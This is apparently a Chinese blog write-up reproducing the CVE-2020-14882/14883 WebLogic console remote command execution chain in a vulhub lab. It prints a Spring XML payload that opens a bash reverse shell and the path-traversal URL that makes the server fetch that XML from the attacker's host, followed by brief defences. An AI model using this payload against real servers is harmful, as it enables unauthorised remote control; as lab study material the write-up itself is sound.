CVE-2020-14882, CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞
0X00-引言
最近有点急功心切,想直接变成大佬,难免有点眼高手低,导致现在看一些事情都会变得不爽,总觉得自己才是对的,甚至有点焦虑。心态出了问题,需要调整一下,一口气吃不了一个胖子,欲速则不达,呼气吐气,呼气吐气。
这世界大部分的抒情,都会被认为无病呻吟,能够理解你得了什么病,基本都是知己。
------《云边有个小卖部》
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-漏洞描述
CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
0X03-漏洞复现
01-反弹shell
POC:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i /dev/tcp/IP/PORT 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>
生成XML文件,在kali中开启web服务
通过以下URL使Weblogic加载XML
http://192.168.234.128:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.234.135:666/POC.xml")
成功反弹
0X04-漏洞防御
禁止访问console
升级版本
0X05-免责声明
仅供学习参考
0X06-参考
https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md